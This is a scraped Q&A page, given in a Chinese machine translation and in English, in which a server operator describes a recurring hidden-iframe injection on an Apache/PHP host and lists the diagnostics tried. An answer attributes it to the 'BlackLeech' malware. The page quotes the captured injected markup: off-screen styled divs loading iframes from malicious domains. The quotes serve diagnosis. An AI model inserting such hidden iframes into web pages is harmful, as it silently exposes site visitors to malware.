iFrame注入攻击跟随我们到新服务器 [英] iFrame Injection Attack Followed us to New Server

查看:150
本文介绍了iFrame注入攻击跟随我们到新服务器的处理方法,对大家解决问题具有一定的参考价值,需要的朋友们下面随着小编来一起学习吧!

问题描述

几个月前,一个隐藏的iFrame开始出现在我们专用服务器上每个站点的每个页面上。当我们使用503关闭网站进行维护时,iFrame仍然在维护页面上。最终,主机阻止了iFrame的来源,但我们从未找到后门。注入的iFrame看起来像这样,但包含在样式标记中以混淆和使用各种URL:



iframe src =http://heusnsy.nl/32283947。 html ..



我们将较小的网站迁移到另一个主机,他们一直很好。



我们将主站点移动到同一主机上的新专用服务器,尽管我们努力锁定服务器 - 防火墙,限制访问,软件更新,检查每个文件 - iFrame返回。



我们到处寻找它是如何进入的 - 配置文件,htaccess - 但找不到它。



任何想法隐藏的iFrame注入漏洞可能是什么?



编辑:
以下是更多细节:运行Apache和PHP的Linux机器。所有内容的最新版本。注入的代码看起来像这样:



< style> .ivx4di91j1 {position:absolute; left:-1418px; top:-1348px}< / style> ;< div class = ivx4di91j1>< iframe src =heusnsy.nl /32283947.html ..



更新:
这是更多信息和我们学到的东西:



主机:Station CentOS Linux 6.3 - x86_64 / Apache 2.2.15版上的Linux 2.6.32-279.5.1.el6.x86_64 - PHP 5.3.3(cli)(内置:2012年7月3日16:53:21)


  1. 服务器本身不受损害。


  2. 包括(apache / php)在内的所有服务都升级到我们系统可用的最新版本。


  3. 没有帐户(ftp或其他方式)遭到入侵。


  4. 恶意软件在几个受感染的网站上同时更改了目标网址(iframe src =) 。 (由unmaskparasites.com提供)


  5. 在更改src目标期间,没有执行/运行流氓或隐藏进程。


  6. TCPDUMP在离开端口80 tcp的同时获得了恶意软件的代码,但是在接收恶意软件的用户的GET请求中没有发现任何异常 - 在相应的apache访问中没有发现任何异常日志也是。


  7. 在切换iFrame的src url地址期间,网站文件或httpd / php二进制文件没有以任何方式更改 - 由md5sum检查提供。


  8. 在更改期间,已知端口上的已知端口没有发生恶意连接。防火墙负责其余部分。


  9. rkhunter和maldet没有结果。


  10. 恶意软件iFrame在此服务器上的所有帐户和网站上的任何具有此标记的页面上的第一个< / script>标记之后立即被触发并注入。 / p>


  11. 恶意软件被注入静态页面和没有数据库连接的站点上。 (页面足够< head>< / script>< / head> 标签)


  12. 没有安装流氓apache模块或php模块(不包括mycript.so)。大多数默认的apache模块都被挂起并注释掉了。


  13. 恶意软件不会一直存在。它来来去去,有时会关闭几个小时,然后出现在几个用户身上并再次出去。非常难以追踪。


  14. 100%的php代码和我们网站上运行的大多数javascript代码(除了phpmyadmin)都是自定义编码。唯一没有的是Jquery库。


服务器是高流量机器,日志中的搜索/匹配是非常慢。每周访问日志可以超过15GB。



这就是情况......这不再是受损帐户,黑客文件,流氓脚本的问题。这是我们迄今为止看到的任何东西,其原因隐藏在apache / php本身的某个地方。 (至少这是我们的想法)。任何帮助或想法都非常感谢。



以下是iFrame注入的示例:



< script src = /templates/js/jquery-1.4.2.min.jstype =text / javascript>< / script>< style> .pw0xxs {position:absolute;左:-1795px;顶部:-1357px}< / style> < div class =pw0xxs>< iframe src =http://infectedsite.com/84064443.html\"width =167height =332>< / iframe>< / div>



< script src =http://ajax.googleapis.com/ajax/libs/jquery/ 1 / jquery.min.jstype =text / javascript>< / script>< style> .h3fuonj6 {position:absolute;左:-1012px;顶部:-1348px}< / style> < div class =h3fuonj6>< iframe src =http://infectedsite.com/13334443.html\"width =236height =564>< / iframe>< / div> ;



< / script>< style> .exm31sfk8l {position:absolute;左:-1349px;顶部:-1836px}< / style> < div class =exm31sfk8l>< iframe src =http://infectedsite.com/79144443.htmlwid th =559height =135>< / iframe>< / div> ;
document.write('< style> .exm31sfk8l {position:absolute; left:-1349px; top:-1836px}< / style>< div class =exm31sfk8l>< iframe src = http://ksner.pl/79144443.ht mlwidth =559height =135>< / iframe>< / div>'); // ColorBox v1.3.19.3 - jQuery lightbox插件



< / script>< style> .rv9mlj {position:absolute;左:-1698px;顶部:-1799px}< / style> < div class =rv9mlj>< iframe src =http://infectedsite.com/42054443.htmlwidth =163height =409>< / iframe>< / div>



< script src =./ js / cross_framing_protection.js?ts = 1344391602type =text /javascript\"></script><style>.rv9mlj {position:absolute;左:-1698px;顶部:-1799px}< / style> < div class =rv9mlj>< iframe src =http://infectedsite.com/42054443.html\"width =163height =409>< / iframe>< / div>

解决方案

检查一下......提升服务器程序的恶作剧作者是众所周知的作为Left4Dead - 他的iframe注入doo-hicky被称为BlackLeech。你可以在Damagelab .org(CRIMINAL FORUM !!)上找到这个绅士和他的广告。



每次root登录时,恶意软件都会停止所有活动,或者你是SSH进入你的服务器。它还监视系统监视工具:|



Damagelab .org广告的屏幕截图:



http://imgur.com/NRQQl



恶意软件广告的文字作者:



http://pastebin.com/u7AcYSNi



注意你的线程如何被列为参考:))



如果您需要翻译帮助,请打我!




A few months ago, a hidden iFrame started showing up on every page on every site on our dedicated server. When we took the sites down for maintenance with a 503, the iFrame was still there on the down for maintenance page. Eventually, the host blocked the source of the iFrame, but we never found the backdoor. The injected iFrame looked something like this, but wrapped in a style tag to obfuscate and with various URLs:

iframe src="http://heusnsy.nl/32283947.html..

We moved our smaller sites to a different host, and they've been fine.

We moved our main site to a new dedicated server on the same host, and despite our efforts to lock down the server - firewalls, restricted access, software updates, inspecting every file - the iFrame returned.

We've looked everywhere to locate how this is getting in - config files, htaccess - but can't find it.

Any idea where the hidden iFrame injection vulnerabilities could be?

Edit : Here are more details: Linux machine running Apache and PHP. Latest versions of everything. The code the was injected looks like this:

<style>.ivx4di91j1 { position:absolute; left:-1418px; top:-1348px} </style> <div class="ivx4di91j1"><iframe src="heusnsy.nl/32283947.html..

Update : Here is more information and what we have learned:

host: Station CentOS Linux 6.3 - Linux 2.6.32-279.5.1.el6.x86_64 on x86_64 / Apache version 2.2.15 - PHP 5.3.3 (cli) (built: Jul 3 2012 16:53:21)

  1. Server itself is not compromised.

  2. All the services including (apache/php) are upgraded to the latest versions available for our system.

  3. No accounts (ftp or otherwise) were compromised.

  4. Malware changes it's destination URL (iframe src=) simultaneously on several infected sites. (Courtesy of unmaskparasites.com)

  5. During the change of the src target, no rogue or hidden processes were executed/running.

  6. TCPDUMP got the code of the malware while leaving out of port 80 tcp but nothing strange was found in the GET request from the user receiving the malware - nothing strange was found in the corresponding apache access logs too.

  7. Website files or the httpd/php binary's were not changed in any way during the switch of src url address of the iFrame - courtesy of md5sum check.

  8. No rogue connections were made on the known ports for the known services during the change. Firewall takes care for the rest.

  9. rkhunter and maldet came up with no results.

  10. Malware iFrame gets triggered and injected right after the first "</script>" tag on any page having this tag, on all accounts and websites on this server.

  11. Malware gets injected into static pages and on sites without database connections. (it is enough for the page to have <head> </script></head> tags)

  12. No rogue apache modules or php modules (excluding mycript.so) were installed. Most of the default apache modules are suspended and commented out.

  13. Malware is not constantly present. It comes and goes, sometimes it's off for several hours, and then shows up for several users and goes out again. Making it extremely hard to trace.

  14. 100% of the php codes and most of the javascript codes runing on our sites (except the phpmyadmin one) are custom coded. The only thing that is not are the Jquery libs.

Server is high traffic machine and searching/matching in logs is extremely slow. Weekly access log can become over 15gb.

That's the situation... It's no longer a matter of compromised accounts, hacked files, rogue scripts. This is something beyond anything we've seen so far and the cause is hidden somewhere in the apache/php itself. (At least this is what we think). Any help or ideas are much appreciated.

Here are examples of the iFrame injection:

<script src="/templates/js/jquery-1.4.2.min.js" type="text/javascript"></script><style>.pw0xxs { position:absolute; left:-1795px; top:-1357px} </   style> <div class="pw0xxs"><iframe src="http://infectedsite.com/84064443.html" width="167" height="332"></iframe></div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js" type="text/javascript"></script><style>.h3fuonj6 { position:absolute; left :-1012px; top:-1348px} </style> <div class="h3fuonj6"><iframe src="http://infectedsite.com/13334443.html" width="236" height="564"></iframe></div >

</script><style>.exm31sfk8l { position:absolute; left:-1349px; top:-1836px} </style> <div class="exm31sfk8l"><iframe src="http://infectedsite.com/79144443.html" wid th="559" height="135"></iframe></div> document.write('<style>.exm31sfk8l { position:absolute; left:-1349px; top:-1836px} </style> <div class="exm31sfk8l"><iframe src="http://ksner.pl/79144443.ht ml" width="559" height="135"></iframe></div>');// ColorBox v1.3.19.3 - jQuery lightbox plugin

</script><style>.rv9mlj { position:absolute; left:-1698px; top:-1799px} </style> <div class="rv9mlj"><iframe src="http://infectedsite.com/42054443. html" width="163" height="409"></iframe></div>

<script src="./js/cross_framing_protection.js?ts=1344391602" type="text/javascript"></script><style>.rv9mlj { position:absolute; left:-1698px; top:-1799px}  </style> <div class="rv9mlj"><iframe src="http://infectedsite.com/42054443.html" width="163" height="409"></iframe></div>

解决方案

Check it...the miscreant author of the program that jacked up your server is known as "Left4Dead" -- his iframe injection doo-hicky is called "BlackLeech." You can find this gent and his advert on Damagelab .org (CRIMINAL FORUM!!).

Every time root logs in, the malware ceases all activity, or if you SSH into your server. It also monitors system monitoring tools :|

Screen shot of Damagelab .org advert:

http://imgur.com/NRQQl

Text of malware advert by the author:

http://pastebin.com/u7AcYSNi

notice how your thread is listed as a reference :))

if you need help with translation, hit me up!

这篇关于iFrame注入攻击跟随我们到新服务器的文章就介绍到这了,希望我们推荐的答案对大家有所帮助,也希望大家多多支持IT屋!

查看全文
相关文章
其他开发最新文章
热门教程
热门工具
登录 关闭
扫码关注1秒登录
发送“验证码”获取 | 15天全站免登陆